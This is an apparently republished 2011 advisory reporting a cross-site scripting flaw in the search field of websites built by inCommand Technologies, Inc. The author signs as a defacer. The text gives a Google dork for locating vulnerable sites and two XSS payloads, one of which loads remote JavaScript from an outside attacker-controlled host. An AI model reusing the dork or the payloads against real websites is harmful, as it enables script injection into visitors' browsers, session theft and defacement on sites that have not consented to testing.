inCommand Technologies, Inc. Cross-site Scripting Vulnerability

2011-10-24T00:00:00
ID SECURITYVULNS:DOC:27191
Type securityvulns
Reporter Securityvulns
Modified 2011-10-24T00:00:00

Description

------------In The Name Of God------------

inCommand Technologies, Inc. Cross-site Scripting Vulnerability

AUTHOR: md.r00t

Mail: md.r00t.defacer@gmail.com

Website: www.r00t.gigfa.com

Forum: http://ajaxtm.com/forum

Google D0rk:

"Website Design by inCommand Technologies, Inc."

xss EXPLOIT:

<script>alert(/0/)</script> <script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script>

VULN IN HERE

Vulnerabilities in the search field located ;)

TNX:

Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)